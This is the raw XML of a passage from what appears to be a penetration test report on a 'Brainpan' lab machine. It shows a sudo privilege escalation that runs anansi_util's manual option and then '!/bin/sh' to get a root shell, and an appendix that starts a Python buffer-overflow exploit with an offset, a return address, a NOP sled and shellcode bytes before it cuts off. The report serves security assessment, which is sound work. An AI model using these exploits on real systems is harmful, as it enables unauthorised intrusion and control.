        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="008D6B27" w:rsidRPr="00E81FB2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nansi_util</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008D6B27">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008D6B27" w:rsidRPr="006730A9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> again with the manual option and a random command specified. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F89C874" w14:textId="5E3F24CB" w:rsidR="0087064E" w:rsidRPr="0087064E" w:rsidRDefault="0087064E" w:rsidP="00902E27">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0087064E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0087064E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> /home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0087064E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>anansi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0087064E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0087064E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>anansi_util</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0087064E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> manual man</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC9F42C" w14:textId="024CDD57" w:rsidR="005753A8" w:rsidRDefault="005753A8" w:rsidP="00902E27">
      <w:pPr>
        <w:spacing w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Thereafter, we open a root shell by </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">typing </w:t>
      </w:r>
      <w:r w:rsidRPr="0087064E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0087064E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/bin/sh</w:t>
      </w:r>
      <w:r w:rsidRPr="0087064E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4F2C3B" w14:textId="77777777" w:rsidR="008D6B27" w:rsidRDefault="008D6B27" w:rsidP="00902E27">
      <w:pPr>
        <w:spacing w:before="240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26E990D3" w14:textId="77777777" w:rsidR="008D6B27" w:rsidRDefault="008D6B27" w:rsidP="00902E27">
      <w:pPr>
        <w:spacing w:before="240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ECF7234" w14:textId="77777777" w:rsidR="008D6B27" w:rsidRDefault="008D6B27" w:rsidP="00902E27">
      <w:pPr>
        <w:spacing w:before="240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D2F7273" w14:textId="77777777" w:rsidR="008D6B27" w:rsidRDefault="008D6B27" w:rsidP="00902E27">
      <w:pPr>
        <w:spacing w:before="240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B7263E2" w14:textId="77777777" w:rsidR="008D6B27" w:rsidRDefault="008D6B27" w:rsidP="00902E27">
      <w:pPr>
        <w:spacing w:before="240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="444EC6D9" w14:textId="77777777" w:rsidR="008D6B27" w:rsidRDefault="008D6B27" w:rsidP="00902E27">
      <w:pPr>
        <w:spacing w:before="240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A247997" w14:textId="5FBDD580" w:rsidR="008D6B27" w:rsidRPr="00DA678C" w:rsidRDefault="008D6B27" w:rsidP="00902E27">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DA678C">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Typing </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA678C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DA678C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA678C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA678C">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> after running </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA678C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA678C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> /home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA678C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>anansi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA678C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA678C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>anansi_util</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA678C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> manual man</w:t>
      </w:r>
      <w:r w:rsidR="00DA678C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4381DDC8" w14:textId="325EE0C4" w:rsidR="0087064E" w:rsidRDefault="0087064E" w:rsidP="00902E27">
      <w:pPr>
        <w:spacing w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F8F8422" wp14:editId="45A51DA1">
            <wp:extent cx="5041127" cy="3110206"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="2082022723" name="Picture 12" descr="skipping &#10;MAN(I) &#10;man &#10;SYNOPSIS &#10;an &#10;interface &#10;file] &#10;to &#10;Manual pager utils &#10;the on-line reference manuals &#10;MAN(I) &#10;man [ -C &#10;locale] [-m system[ &#10;[ — regexl —wildcard] &#10;[-r prompt] [-7] [-E encoding] [ —no-hyphenation] [ —no-justifi- &#10;cation] &#10;[ -p string] &#10;[-0 [-T[device]] &#10;[-H[browser]] [-X[dpi]] &#10;[ [section] ] &#10;man -k [apropos options] regexp &#10;man -K [-wl-w] [-S list] [-il-l] [ —regex] [section] term &#10;man -f [whatis options] &#10;[ -D] [ —warnings[ -warnings] -J &#10;[-R encoding] [-L &#10;[-il-l] &#10;, J] [-M path] [-S list] &#10;[ -e extension] &#10;[ —names-only] [ -a] [ -u] &#10;[ — no-subpages] &#10;man -1 [-C file] &#10;locale] &#10;[-P pager] &#10;[-r &#10;-T[device]] [-H[browser]] &#10;man -wl-w [-C file] [ &#10;man -c [-C file] &#10;man [-hV] &#10;DESCRIPTION &#10;Manual page ran(l) line 1 ( ores: &#10;[ —warnings[ -warnings] -J &#10;[ -R encoding] &#10;prompt] &#10;[-7] [-E encoding] [-p string] &#10;[-X[dpi]] file . &#10;-D] 2_age . &#10;far &#10;c;nit. &#10;! /bin/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kipping &#10;MAN(I) &#10;man &#10;SYNOPSIS &#10;an &#10;interface &#10;file] &#10;to &#10;Manual pager utils &#10;the on-line reference manuals &#10;MAN(I) &#10;man [ -C &#10;locale] [-m system[ &#10;[ — regexl —wildcard] &#10;[-r prompt] [-7] [-E encoding] [ —no-hyphenation] [ —no-justifi- &#10;cation] &#10;[ -p string] &#10;[-0 [-T[device]] &#10;[-H[browser]] [-X[dpi]] &#10;[ [section] ] &#10;man -k [apropos options] regexp &#10;man -K [-wl-w] [-S list] [-il-l] [ —regex] [section] term &#10;man -f [whatis options] &#10;[ -D] [ —warnings[ -warnings] -J &#10;[-R encoding] [-L &#10;[-il-l] &#10;, J] [-M path] [-S list] &#10;[ -e extension] &#10;[ —names-only] [ -a] [ -u] &#10;[ — no-subpages] &#10;man -1 [-C file] &#10;locale] &#10;[-P pager] &#10;[-r &#10;-T[device]] [-H[browser]] &#10;man -wl-w [-C file] [ &#10;man -c [-C file] &#10;man [-hV] &#10;DESCRIPTION &#10;Manual page ran(l) line 1 ( ores: &#10;[ —warnings[ -warnings] -J &#10;[ -R encoding] &#10;prompt] &#10;[-7] [-E encoding] [-p string] &#10;[-X[dpi]] file . &#10;-D] 2_age . &#10;far &#10;c;nit. &#10;! /bin/sh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4005" cy="3118152"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2728EF2B" w14:textId="7F106FFC" w:rsidR="3EFF00EC" w:rsidRPr="006476E5" w:rsidRDefault="006476E5" w:rsidP="3EFF00EC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006476E5">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Gaining a root shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475C648C" w14:textId="10E200B1" w:rsidR="3EFF00EC" w:rsidRDefault="0087064E" w:rsidP="3EFF00EC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7948FBDE" wp14:editId="69035E11">
            <wp:extent cx="4476076" cy="3768918"/>
            <wp:effectExtent l="0" t="0" r="1270" b="3175"/>
            <wp:docPr id="1745065838" name="Picture 14" descr="sudo /home/anansi/bin/anansi util manual man &#10;No manual entry for manual &#10;# id &#10;id &#10;uid=ø(root) gid=ø(root) groups=ø(root) &#10;# whoami &#10;whoami &#10;root &#10;# ifconfig &#10;ifconfig &#10;etho &#10;10 &#10;Link encap:Ethernet HWaddr &#10;inet addr:1ø.1ø.4.171 Bcast:1ø.10.255.255 Mask:255.255.ø.ø &#10;inet6 addr: fe8ø :: 94:92ff:feø3:33fd/64 Scope: Link &#10;UP BROADCAST RUNNING MULTICAST MTLl:9001 Metric:l &#10;RX packets:118 errors:ø dropped:ø overruns:ø frame:ø &#10;TX packets:155 errors:ø dropped:ø overruns:ø carrier:ø &#10;collisions:ø txqueuelen:løøø &#10;RX bytes:8220 (8.2 KB) TX bytes:28139 (28.1 KB) &#10;Interrupt: 74 &#10;Link encap:Loca1 Loopback &#10;inet addr:127.ø.ø.1 &#10;: 1/128 &#10;inet6 addr: &#10;UP LOOPBACK RUNNING &#10;RX packets:ø errors:ø dropped:ø &#10;TX packets:ø errors:ø dropped:ø &#10;Mask:255.ø.ø O &#10;Scope : Host &#10;MTU:16436 &#10;Metric: 1 &#10;overruns:ø frame:ø &#10;overruns:ø carrier:ø &#10;collisions:ø txqueuelen:ø &#10;RX bytes:ø (0.0 B) TX bytes:ø (0.0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do /home/anansi/bin/anansi util manual man &#10;No manual entry for manual &#10;# id &#10;id &#10;uid=ø(root) gid=ø(root) groups=ø(root) &#10;# whoami &#10;whoami &#10;root &#10;# ifconfig &#10;ifconfig &#10;etho &#10;10 &#10;Link encap:Ethernet HWaddr &#10;inet addr:1ø.1ø.4.171 Bcast:1ø.10.255.255 Mask:255.255.ø.ø &#10;inet6 addr: fe8ø :: 94:92ff:feø3:33fd/64 Scope: Link &#10;UP BROADCAST RUNNING MULTICAST MTLl:9001 Metric:l &#10;RX packets:118 errors:ø dropped:ø overruns:ø frame:ø &#10;TX packets:155 errors:ø dropped:ø overruns:ø carrier:ø &#10;collisions:ø txqueuelen:løøø &#10;RX bytes:8220 (8.2 KB) TX bytes:28139 (28.1 KB) &#10;Interrupt: 74 &#10;Link encap:Loca1 Loopback &#10;inet addr:127.ø.ø.1 &#10;: 1/128 &#10;inet6 addr: &#10;UP LOOPBACK RUNNING &#10;RX packets:ø errors:ø dropped:ø &#10;TX packets:ø errors:ø dropped:ø &#10;Mask:255.ø.ø O &#10;Scope : Host &#10;MTU:16436 &#10;Metric: 1 &#10;overruns:ø frame:ø &#10;overruns:ø carrier:ø &#10;collisions:ø txqueuelen:ø &#10;RX bytes:ø (0.0 B) TX bytes:ø (0.0 B)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3904" cy="3775509"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1C8BC1" w14:textId="109D5419" w:rsidR="3EFF00EC" w:rsidRDefault="0011620F" w:rsidP="3EFF00EC">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>We now have full access and complete control over the system. From this point, an adversary would generally exfiltrate confidential data or further compromise the internal network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1136FA78" w14:textId="76CE3EAD" w:rsidR="00F151E1" w:rsidRDefault="00F151E1" w:rsidP="00A04A14">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc141061111"/>
      <w:r>
        <w:t>Recap</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="0B6EFE69" w14:textId="40152D0A" w:rsidR="00F151E1" w:rsidRDefault="00F151E1" w:rsidP="3EFF00EC">
      <w:r>
        <w:t>As demonstrated above, any flaw in a system</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t>s security, either external or internal, can be leveraged by an attacker to compromise that system, leading to</w:t>
      </w:r>
      <w:r w:rsidR="00CB6BB8">
        <w:t xml:space="preserve">, among other things, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">exposure of confidential customer data or company </w:t>
      </w:r>
      <w:r w:rsidR="00CB6BB8">
        <w:t>secrets.</w:t>
      </w:r>
      <w:r w:rsidR="00E003DE">
        <w:t xml:space="preserve"> Shellshock Sec strongly advises that Brainpan remediate all reported findings in a timely manner. Shellshock Sec also recommends that Brainpan conduct penetration tests annually to find and patch any new security holes that may emerge.</w:t>
      </w:r>
      <w:r w:rsidR="004047A1">
        <w:t xml:space="preserve"> Shellshock Sec cannot guarantee that the tested system will be impenetrable after employing the recommended remediations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074E1713" w14:textId="7B2D7F96" w:rsidR="3EFF00EC" w:rsidRDefault="3EFF00EC" w:rsidP="3EFF00EC"/>
    <w:p w14:paraId="4A10105F" w14:textId="3FF594E8" w:rsidR="3EFF00EC" w:rsidRDefault="00361E1A" w:rsidP="00361E1A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc141061112"/>
      <w:r>
        <w:t>Cleanup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="4F64E9B4" w14:textId="674EAA99" w:rsidR="00361E1A" w:rsidRDefault="00361E1A" w:rsidP="00361E1A">
      <w:r>
        <w:t>After every penetration test, a thorough cleanup is conducted to remove any scripts, tools, or other remnants of the penetration test from the audited systems.</w:t>
      </w:r>
      <w:r w:rsidR="003351F3">
        <w:t xml:space="preserve"> In this case, nothing was uploaded to, or created on the tested system.</w:t>
      </w:r>
      <w:r w:rsidR="006373B4">
        <w:t xml:space="preserve"> Thus, no cleanup is required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BCC2EA" w14:textId="2B7E0B8F" w:rsidR="00485380" w:rsidRDefault="00485380" w:rsidP="008B1CFC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc141061113"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Appendix:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="72928F57" w14:textId="647E790D" w:rsidR="00485380" w:rsidRDefault="008B1CFC" w:rsidP="008B1CFC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc141061114"/>
      <w:r>
        <w:t xml:space="preserve">Buffer Overflow </w:t>
      </w:r>
      <w:r w:rsidR="002421BD">
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">xploit </w:t>
      </w:r>
      <w:r w:rsidR="002421BD">
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>cript:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="24BCB76E" w14:textId="77777777" w:rsidR="008B1CFC" w:rsidRPr="008B1CFC" w:rsidRDefault="008B1CFC" w:rsidP="008B1CFC">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>#!/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>usr/bin/python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D5C0EA"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import </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0156B591" w14:textId="77777777" w:rsidR="008B1CFC" w:rsidRPr="008B1CFC" w:rsidRDefault="008B1CFC" w:rsidP="008B1CFC">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76802628" w14:textId="77777777" w:rsidR="008B1CFC" w:rsidRPr="008B1CFC" w:rsidRDefault="008B1CFC" w:rsidP="008B1CFC">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>badchars</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D44CC5D" w14:textId="77777777" w:rsidR="008B1CFC" w:rsidRPr="008B1CFC" w:rsidRDefault="008B1CFC" w:rsidP="008B1CFC">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4360C628" w14:textId="77777777" w:rsidR="008B1CFC" w:rsidRPr="008B1CFC" w:rsidRDefault="008B1CFC" w:rsidP="008B1CFC">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> = "10.10.148.248"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729EB31C"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port = 9999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4A3D6B" w14:textId="77777777" w:rsidR="008B1CFC" w:rsidRPr="008B1CFC" w:rsidRDefault="008B1CFC" w:rsidP="008B1CFC">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="342322A4"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prefix = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F4AF37"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offset = 524</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF2AF51"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overflow = "A" * offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3C8433" w14:textId="77777777" w:rsidR="008B1CFC" w:rsidRPr="008B1CFC" w:rsidRDefault="008B1CFC" w:rsidP="008B1CFC">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>retn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> = "\xf3\x12\x17\x31"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A88733"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padding = "\x90" * 16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14576DDF"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791EBC48"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"\xb8\x08\x46\x31\x57\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>xdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>\xc8\xd9\x74\x24\xf4\x5a"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B29FFCF"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"\x33\xc9\xb1\x12\x83\</w:t>
      </w:r>
